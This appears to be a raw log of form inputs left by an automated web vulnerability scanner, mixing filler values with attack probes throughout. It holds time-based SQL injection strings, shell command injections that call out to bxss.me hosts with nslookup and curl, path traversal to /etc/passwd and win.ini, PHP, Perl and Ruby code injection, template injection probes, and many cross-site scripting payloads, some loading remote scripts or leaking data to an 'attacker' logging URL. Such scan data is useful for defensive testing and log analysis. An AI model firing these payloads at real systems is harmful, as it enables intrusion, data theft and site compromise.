1-1) OR 617=(SELECT 617 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1-1)) OR 767=(SELECT 767 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555
1
555
1
555
1
555
195zNrvAk' OR 647=(SELECT 647 FROM PG_SLEEP(15))--
555
1
555
1iuEYPb3p') OR 649=(SELECT 649 FROM PG_SLEEP(15))--
555
1
555
17lnK4IHu')) OR 676=(SELECT 676 FROM PG_SLEEP(15))--
555
1
555
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
1
555
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
1
555
1'"
555
1????%2527%2522\'\"
555
@@cW15r
555
(select 198766*667891)
555
(select 198766*667891 from DUAL)
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555Nu9bySTR
1
555
1
555
1
-1 OR 5*5=25 --
1
555
1
-1 OR 5*5=25
1
-1' OR 5*5=25 --
1
-1" OR 5*5=25 --
1
-1' OR 5*5=25 or 'QxPS49S3'='
1
-1" OR 5*5=25 or "Xooacg7G"="
1
555
1
555*if(now()=sysdate(),sleep(15),0)
1
555
1
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
1
555
1
555
1
555
1
555
1
555
1
555
1
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1
555
1
555-1; waitfor delay '0:0:15' --
1
555
1
555-1); waitfor delay '0:0:15' --
1
555
1
555-1 waitfor delay '0:0:15' --
1
555
1
555dBJHr1v1'; waitfor delay '0:0:15' --
1
555
1
555-1 OR 333=(SELECT 333 FROM PG_SLEEP(15))--
1
555
1
555-1) OR 768=(SELECT 768 FROM PG_SLEEP(15))--
1
555
1
555-1)) OR 37=(SELECT 37 FROM PG_SLEEP(15))--
1
555
1
555ycR2DDVQ' OR 777=(SELECT 777 FROM PG_SLEEP(15))--
1
555
1
555GW1Lbrk0') OR 360=(SELECT 360 FROM PG_SLEEP(15))--
1
555
1
555
1
555
1
555
1
555zyb7CwR1')) OR 706=(SELECT 706 FROM PG_SLEEP(15))--
1
555
1
555
1
555
1
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1
555
1
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1
555
1
555'"
1
555
1
555????%2527%2522\'\"
1
@@wxgNR
1
(select 198766*667891)
1
(select 198766*667891 from DUAL)
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
xfs.bxss.me
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
555
1
xfs.bxss.me
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
'"
555
<!--
555
1
555
1
'"
1
555
1
555
1'"()&%<zzz><ScRiPt >Pjot(9780)</ScRiPt>
<!--
1
555
555
'"()&%<zzz><ScRiPt >Pjot(9642)</ScRiPt>
555
12345'"\'\");|]*{ <>?''????
555
1
555
19649220
555
555
1
555
1
555'"()&%<zzz><ScRiPt >Pjot(9144)</ScRiPt>
1
12345'"\'\");|]*{ <>?''????
1
555
1
'"()&%<zzz><ScRiPt >Pjot(9991)</ScRiPt>
1
555
1
5559546279
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1oFc2kEJx
555
1
555
1
555
response.write(9765739*9326086)
555
1
555
1
555
'+response.write(9765739*9326086)+'
555
"+response.write(9765739*9326086)+"
555
1
555
1
555
1
response.write(9668508*9216243)
1
'+response.write(9668508*9216243)+'
1
555
1
555
1
"+response.write(9668508*9216243)+"
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
echo xgtiml$()\ lzacmw\nz^xyu||a #' &echo xgtiml$()\ lzacmw\nz^xyu||a #|" &echo xgtiml$()\ lzacmw\nz^xyu||a #
555
1
555
1
555
1
555
&echo gtrvqr$()\ vsdbmk\nz^xyu||a #' &echo gtrvqr$()\ vsdbmk\nz^xyu||a #|" &echo gtrvqr$()\ vsdbmk\nz^xyu||a #
555
1
555
1
555
1&echo qmbmkl$()\ nrpfmr\nz^xyu||a #' &echo qmbmkl$()\ nrpfmr\nz^xyu||a #|" &echo qmbmkl$()\ nrpfmr\nz^xyu||a #
555
-1 OR 5*5=25 --
555
1
555
|echo orknli$()\ nptloh\nz^xyu||a #' |echo orknli$()\ nptloh\nz^xyu||a #|" |echo orknli$()\ nptloh\nz^xyu||a #
555
-1 OR 5*5=25
555
1
555
1
555
1
555
-1' OR 5*5=25 --
555
1
555
1
555
1|echo qqubnt$()\ hfeelc\nz^xyu||a #' |echo qqubnt$()\ hfeelc\nz^xyu||a #|" |echo qqubnt$()\ hfeelc\nz^xyu||a #
555
1
555
-1" OR 5*5=25 --
555
expr 9000562016 - 986197
555
1
555
-1' OR 5*5=25 or 'WKI8uLch'='
555
1
555
(nslookup -q=cname hitxlgcdsuwef44597.bxss.me||curl hitxlgcdsuwef44597.bxss.me))
555
1
555
-1" OR 5*5=25 or "mK8db5ev"="
555
$(nslookup -q=cname hitblagzlehrgbf07c.bxss.me||curl hitblagzlehrgbf07c.bxss.me)
555
1
555
&nslookup -q=cname hitewaqqwehfud8464.bxss.me&'\"`0&nslookup -q=cname hitewaqqwehfud8464.bxss.me&`'
555
1
555
1
555
&(nslookup -q=cname hitpopmzouasyd1425.bxss.me||curl hitpopmzouasyd1425.bxss.me)&'\"`0&(nslookup -q=cname hitpopmzouasyd1425.bxss.me||curl hitpopmzouasyd1425.bxss.me)&`'
555
1
555
|(nslookup -q=cname hithwezkrvnkzbcd1b.bxss.me||curl hithwezkrvnkzbcd1b.bxss.me)
555
1
555
1
555
`(nslookup -q=cname hitrpzleoncys6b10f.bxss.me||curl hitrpzleoncys6b10f.bxss.me)`
555
;(nslookup -q=cname hitsjzrvpfygn59108.bxss.me||curl hitsjzrvpfygn59108.bxss.me)|(nslookup -q=cname hitsjzrvpfygn59108.bxss.me||curl hitsjzrvpfygn59108.bxss.me)&(nslookup -q=cname hitsjzrvpfygn591
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitgxjxmiugzr6a6a8.bxss.me||curl${IFS}hitgxjxmiugzr6a6a8.bxss.me)
555
1
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitmlmwrbrxqw7d81f.bxss.me||curl${IFS}hitmlmwrbrxqw7d81f.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitmlmwrbrxqw7d81f.bxss.me||curl${IFS}h
555
1
555
SJkWq58w
555
1
555
1
555
y4YzuZJq: E2c08ZTG
555
1
ZTw2Ij0J
1
echo iudxbj$()\ qbozng\nz^xyu||a #' &echo iudxbj$()\ qbozng\nz^xyu||a #|" &echo iudxbj$()\ qbozng\nz^xyu||a #
1
Gd63jIQn: m3vikrmt
1
555
1*if(now()=sysdate(),sleep(15),0)
&echo sczqjp$()\ prphco\nz^xyu||a #' &echo sczqjp$()\ prphco\nz^xyu||a #|" &echo sczqjp$()\ prphco\nz^xyu||a #
1
555
1
555
1
555&echo xnrvnv$()\ pgfcif\nz^xyu||a #' &echo xnrvnv$()\ pgfcif\nz^xyu||a #|" &echo xnrvnv$()\ pgfcif\nz^xyu||a #
1
555
1
555
1
|echo rkmnom$()\ asomap\nz^xyu||a #' |echo rkmnom$()\ asomap\nz^xyu||a #|" |echo rkmnom$()\ asomap\nz^xyu||a #
1
555
1
555|echo jxgnub$()\ ltkqkj\nz^xyu||a #' |echo jxgnub$()\ ltkqkj\nz^xyu||a #|" |echo jxgnub$()\ ltkqkj\nz^xyu||a #
1
555
1
555
1
expr 9000760790 - 974106
1
555
1
(nslookup -q=cname hitmigfbwxffgc7087.bxss.me||curl hitmigfbwxffgc7087.bxss.me))
1
555
1
555
1
$(nslookup -q=cname hitjgguqbmxeb08044.bxss.me||curl hitjgguqbmxeb08044.bxss.me)
1
555
1
555
1
555
1
&nslookup -q=cname hitmnhslavhnz341fb.bxss.me&'\"`0&nslookup -q=cname hitmnhslavhnz341fb.bxss.me&`'
1
555
1
&(nslookup -q=cname hitwzziyqavnvc1f6c.bxss.me||curl hitwzziyqavnvc1f6c.bxss.me)&'\"`0&(nslookup -q=cname hitwzziyqavnvc1f6c.bxss.me||curl hitwzziyqavnvc1f6c.bxss.me)&`'
1
555
1
555
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
555
1
|(nslookup -q=cname hithaxhqcvmgb14b6c.bxss.me||curl hithaxhqcvmgb14b6c.bxss.me)
1
555
1
555
1
555
../../../../../../../../../../../../../../etc/passwd
`(nslookup -q=cname hitfofifzmcrz16423.bxss.me||curl hitfofifzmcrz16423.bxss.me)`
1
555
1
555
1
555
../../../../../../../../../../../../../../windows/win.ini
;(nslookup -q=cname hitohkunuxaobbb35e.bxss.me||curl hitohkunuxaobbb35e.bxss.me)|(nslookup -q=cname hitohkunuxaobbb35e.bxss.me||curl hitohkunuxaobbb35e.bxss.me)&(nslookup -q=cname hitohkunuxaobbb35e.bxss.me||curl hitohkunuxaobbb35e.bxss.me)
1
555
1
555
file:///etc/passwd
|(nslookup${IFS}-q${IFS}cname${IFS}hitsodpplzkmf33d06.bxss.me||curl${IFS}hitsodpplzkmf33d06.bxss.me)
1
555
1
&(nslookup${IFS}-q${IFS}cname${IFS}hitjvpxrkfuyef77f4.bxss.me||curl${IFS}hitjvpxrkfuyef77f4.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitjvpxrkfuyef77f4.bxss.me||curl${IFS}hitjvpxrkfuyef77f4.bxss.me)&`'
1
555
1
555
1
555
../1
555
1
555
1
555
1
../../../../../../../../../../../../../../etc/passwd
1
555
1
555
1
555
1
555
1<esi:include src="http://bxss.me/rpb.png"/>
555
1
../../../../../../../../../../../../../../windows/win.ini
1
555
1
555<esi:include src="http://bxss.me/rpb.png"/>
1
file:///etc/passwd
1
555
1
555
1
555
1
555
1
555
1
555
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
555
${10000391+10000010}
555
1
../555
1
555
1
555
1
555
1
${9999639+10000172}
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
1
555
1
555
1
555
';print(md5(31337));$a='
555
1
555
";print(md5(31337));$a="
555
1
555
1
555
1
555
1
555
1
555
${@print(md5(31337))}
555
1
555
1
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
1
555
'.gethostbyname(lc('hitzh'.'oanzxwrx52d63.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(84).chr(101).chr(65).'
555
${@print(md5(31337))}\
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
".gethostbyname(lc("hitvm"."yecwaqei70270.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(75).chr(97).chr(68)."
555
1
555
1
555
1
555
'.print(md5(31337)).'
555
gethostbyname(lc('hitfm'.'qlrytzdq1ac56.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(65).chr(101).chr(86)
555
1
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
555
1
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1
555
1
555
1
555
1
'.gethostbyname(lc('hitpf'.'dkvryrzbad233.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(65).chr(119).chr(66).'
1
';print(md5(31337));$a='
1
555
/etc/shells
555
1
555
1
555
1
".gethostbyname(lc("hittr"."dzalrvbna528a.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(71).chr(98).chr(72)."
1
555
../../../../../../../../../../../../../../etc/shells
555
1
gethostbyname(lc('hitwy'.'wmptpnprfa94a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(81).chr(117).chr(71)
1
";print(md5(31337));$a="
1
555
c:/windows/win.ini
555
1
555
1
${@print(md5(31337))}
1
555
bxss.me
555
1
555
1
555
1
${@print(md5(31337))}\
1
555
Http://bxss.me/t/fit.txt
555
1
555
1
555
http://bxss.me/t/fit.txt?.jpg
555
1
'.print(md5(31337)).'
1
555
1-1; waitfor delay '0:0:15' --
555
1
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
1
555
1
555
1
555
1
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
1
555
HttP://bxss.me/t/xss.html?%00
555
1
555
1
555
1
555
1
555
bxss.me/t/xss.html?%00
/etc/shells
1
555
1
HttP://bxss.me/t/xss.html?%00
1
555
1
555
1
bxss.me/t/xss.html?%00
1
../../../../../../../../../../../../../../etc/shells
1
555
1
555
1
555
1
555
1
555
1
c:/windows/win.ini
1
555
1
555
1
555
1
555
1
bxss.me
1
555
1
555
1
555
1
Http://bxss.me/t/fit.txt
1
555
1
555
1
http://bxss.me/t/fit.txt?.jpg
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1-1); waitfor delay '0:0:15' --
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
"+"A".concat(70-3).concat(22*4).concat(116).concat(78).concat(100).concat(87)+(require"socket" Socket.gethostbyname("hitzw"+"hcwnjbiqceb59.bxss.me.")[3].to_s)+&
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
depoimentos
555
1
555
1
555
1
555
'+'A'.concat(70-3).concat(22*4).concat(116).concat(84).concat(120).concat(71)+(require'socket' Socket.gethostbyname('hitjk'+'tkamaavjd777e.bxss.me.')[3].to_s)+&
555
depoimentos
555
1
555
1-1 waitfor delay '0:0:15' --
555
redirtest.acx
555
'A'.concat(70-3).concat(22*4).concat(97).concat(85).concat(116).concat(67)+(require'socket' Socket.gethostbyname('hitgj'+'lmlndixh9258d.bxss.me.')[3].to_s)
555
1
555
1
555
1
redirtest.acx
1
"+"A".concat(70-3).concat(22*4).concat(118).concat(78).concat(113).concat(75)+(require"socket" Socket.gethostbyname("hitps"+"ylmpvmkffe788.bxss.me.")[3].to_s)+"
1
555
depoimentos/.
555
1
555
1
'+'A'.concat(70-3).concat(22*4).concat(114).concat(71).concat(97).concat(70)+(require'socket' Socket.gethostbyname('hittv'+'wexhzycab37cf.bxss.me.')[3].to_s)+'
1
555
1
555
1
555
1
555
1
'A'.concat(70-3).concat(22*4).concat(112).concat(83).concat(98).concat(67)+(require'socket' Socket.gethostbyname('hiten'+'oexvuzmf6815e.bxss.me.')[3].to_s)
1
depoimentos
1
555
1
555
1
555
1
555
1
555
1
depoimentos
1
555
1
555
1&n972032=v957414
555
1
555
1
depoimentos/.
1
555
1
555
1
555&n972551=v958216
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1oi64AglB'; waitfor delay '0:0:15' --
555
1
555
)
555
1
555
1
555
1
555
1
555
1
555
!(()&&!|*|*|
555
1
555
1
555
1
555
^(#$!@#$)(()))******
555
1
555
1
555
1
555
1
555
1
555
1
555
1
)
1
555
1
555
1
555
1
555
1
555
1
555
1
!(()&&!|*|*|
1
555
1
555
1
555
1
555
555
1
555
1
555
1
^(#$!@#$)(()))******
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
555
1
555
1
555
1
555
1
555
1-1 OR 70=(SELECT 70 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555
1
555
1
555
1
555
555
1
555
1
555
1
555
1
555
'"()
555
1
555
1
555
1
555
1'&&sleep(27*1000)*gypszi&&'
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1"&&sleep(27*1000)*dyrnup&&"
555
1
555
1
555
1
555
1
555
1'||sleep(27*1000)*oofoup||'
555
1
555
1
555
1
555
1
555
1"||sleep(27*1000)*zupnpk||"
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1-1) OR 844=(SELECT 844 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555
1
'"()
1
555
1
555
1
555
1
555
1
555
1
555
1
555'&&sleep(27*1000)*gatcrl&&'
1
555
1
555
1
555
1
555"&&sleep(27*1000)*xjgmsu&&"
1
555
1
555
1
555'||sleep(27*1000)*gqmxfs||'
1
555
1
555
1
555
1
555"||sleep(27*1000)*vhnyuj||"
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1-1)) OR 218=(SELECT 218 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1xu5wxo51' OR 126=(SELECT 126 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1IuB8hsdO') OR 795=(SELECT 795 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1cvDu0Iji')) OR 688=(SELECT 688 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555
1
555
1
555
1
555
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
1
555
1
555
1
555
1'"
555
1
555
1
555
1????%2527%2522\'\"
555
1
555
1
555
@@UESlQ
555
1
555
1
555
(select 198766*667891)
555
(select 198766*667891 from DUAL)
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555EZ1GrxYN
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
-1 OR 5*5=25 --
1
555
1
-1 OR 5*5=25
1
-1' OR 5*5=25 --
1
-1" OR 5*5=25 --
1
-1' OR 5*5=25 or '0o421V4q'='
1
-1" OR 5*5=25 or "PcKY7BwD"="
1
555
1
555
1
555*if(now()=sysdate(),sleep(15),0)
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
1
555
1
555
1
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
1
555
1
555
1
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1
555
1
555
1
555-1; waitfor delay '0:0:15' --
1
555
1
555
1
555-1); waitfor delay '0:0:15' --
1
555
1
555
1
555-1 waitfor delay '0:0:15' --
1
555
1
555
1
555wOeBWEEb'; waitfor delay '0:0:15' --
1
555
1
555
1
555-1 OR 304=(SELECT 304 FROM PG_SLEEP(15))--
1
555
1
555
1
555-1) OR 603=(SELECT 603 FROM PG_SLEEP(15))--
1
555
1
555
1
555-1)) OR 52=(SELECT 52 FROM PG_SLEEP(15))--
1
555
1
555
1
555arJZ0TAI' OR 882=(SELECT 882 FROM PG_SLEEP(15))--
1
555
1
555
1
555owl5Goyq') OR 21=(SELECT 21 FROM PG_SLEEP(15))--
1
555
1
555
1
555V6LchbOB')) OR 282=(SELECT 282 FROM PG_SLEEP(15))--
1
555
1
555
1
555
1
555
1
555
1
555
1
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1
555
1
555
1
555
1
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1
555
1
555'"
1
555????%2527%2522\'\"
1
@@92xRL
1
(select 198766*667891)
1
(select 198766*667891 from DUAL)
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1'"()&%<zzz><ScRiPt >5QuA(9828)</ScRiPt>
555'"()&%<zzz><ScRiPt >F3Uf(9880)</ScRiPt>
1
555
'"()&%<zzz><ScRiPt >5QuA(9947)</ScRiPt>
555
1
'"()&%<zzz><ScRiPt >F3Uf(9036)</ScRiPt>
1
555
19029912
555
1
5559277194
1
555
1
555
1
555
1
555
bfg9245?s1?s2?s3?hjl9245
555
1
bfg5861?s1?s2?s3?hjl5861
1
555
bfgx7936??z1??z2a?bcxhjl7936
bfgx7132??z1??z2a?bcxhjl7132
1
555
1
555
<%={{={@{#{${dfb}}%>
<%={{={@{#{${dfb}}%>
1
555
1
555
<th:t="${dfb}#foreach
555
1
<th:t="${dfb}#foreach
1
555
1
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
555
1
555
1
dfb{{98991*97996}}xca
1
555
dfb{{98991*97996}}xca
555
1
555
1
dfb[[${98991*97996}]]xca
1
555
dfb[[${98991*97996}]]xca
555
1
555
1
dfb__${98991*97996}__::.x
1
555
dfb__${98991*97996}__::.x
555
1
555
1
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
1
555
1
555<ScRiPt >F3Uf(9671)</ScRiPt>
1
555
1<ScRiPt >5QuA(9241)</ScRiPt>
555
1
555
1<WDZPEI>TWKFW[!+!]</WDZPEI>
555<WFDJGZ>WMD6J[!+!]</WFDJGZ>
1
555
1
555
1
555
1
555
1<script>5QuA(9181)</script>
555<script>F3Uf(9426)</script>
1
555
1
555
1
555<script>F3Uf(9389)</script>9389
1
555
1<script>5QuA(9339)</script>9339
555
1
555
1
555
1<ScR<ScRiPt>IpT>5QuA(9189)</sCr<ScRiPt>IpT>
555
1
555<ScR<ScRiPt>IpT>F3Uf(9736)</sCr<ScRiPt>IpT>
1
555
1<ScRiPt >5QuA(9390)</ScRiPt>
555
1
555
1
555<ScRiPt >F3Uf(9680)</ScRiPt>
1
555
1
555
1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9214></ScRiPt>
555
1
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9607></ScRiPt>
1
555
1<ScRiPt >5QuA(9299)</ScRiPt>
555
1
555
1
555<ScRiPt >F3Uf(9295)</ScRiPt>
1
555
1<svg ?onload=5QuA(9538);>
555
1
555
1
555<svg ?onload=F3Uf(9882);>
1
555
1
555
1<isindex type=image src=1 onerror=5QuA(9779)>
555
1
555<isindex type=image src=1 onerror=F3Uf(9800)>
1
555
1
555
1
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9718'>
1
555
1
555
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9141'>
555
1
555<body onload=F3Uf(9367)>
1
555
1<body onload=5QuA(9532)>
555
1
555<img src=//xss.bxss.me/t/dot.gif onload=F3Uf(9968)>
1
555
1
555
1<img src=//xss.bxss.me/t/dot.gif onload=5QuA(9457)>
555
1
555<img src=xyz OnErRor=F3Uf(9571)>
1
555
1
555
1<img src=xyz OnErRor=5QuA(9578)>
555
1
555
1
555
1<img/src=">" onerror=alert(9553)>
555<img/src=">" onerror=alert(9047)>
1
555
1
555
1
555
%31%3C%53%63%52%69%50%74%20%3E%35%51%75%41%289852%29%3C%2F%73%43%72%69%70%54%3E
555
1
555
1
%35%35%35%3C%53%63%52%69%50%74%20%3E%46%33%55%66%289789%29%3C%2F%73%43%72%69%70%54%3E
1
555
1
555
1\u003CScRiPt\5QuA(9658)\u003C/sCripT\u003E
555
1
555\u003CScRiPt\F3Uf(9551)\u003C/sCripT\u003E
1
555
1
555
1
555
1<ScRiPt>5QuA(9538)</sCripT>
555<ScRiPt>F3Uf(9671)</sCripT>
1
555
1
555
1
555
?<img zzz onmouseover=5QuA(94611) //?>
?<img zzz onmouseover=F3Uf(98871) //?>
1
555
1
555
1
555
1<input autofocus onfocus=5QuA(9165)>
555<input autofocus onfocus=F3Uf(9907)>
1
555
1
555
<a HrEF=http://xss.bxss.me></a>
<a HrEF=http://xss.bxss.me></a>
1
555
1
555
<a HrEF=jaVaScRiPT:>
555
1
<a HrEF=jaVaScRiPT:>
1
555
1}body{zzz:Expre/**/SSion(5QuA(9692))}
555
1
555}body{zzz:Expre/**/SSion(F3Uf(9647))}
1
555
1
555
1
555
16BM3r <ScRiPt >5QuA(9773)</ScRiPt>
555yr7c3 <ScRiPt >F3Uf(9447)</ScRiPt>
1
555
1
555
1
555<WOPWA8>QX6QZ[!+!]</WOPWA8>
1
555
1<WVT9RX>9LNNC[!+!]</WVT9RX>
555
1
555
1
555<ifRAme sRc=9629.com></IfRamE>
1
555
1
555
1<ifRAme sRc=9015.com></IfRamE>
555
1
555
1
555
1<ajoJ0TY x=9043>
555<aW0dj2f x=9322>
1
555
1
555
1<img sRc='http://attacker-9983/log.php?
555
1
555<img sRc='http://attacker-9430/log.php?
1
555
1
555
1<azKn1cA<
555
1
555<aOiTBer<
1
555
1
555
1
555
1
555
1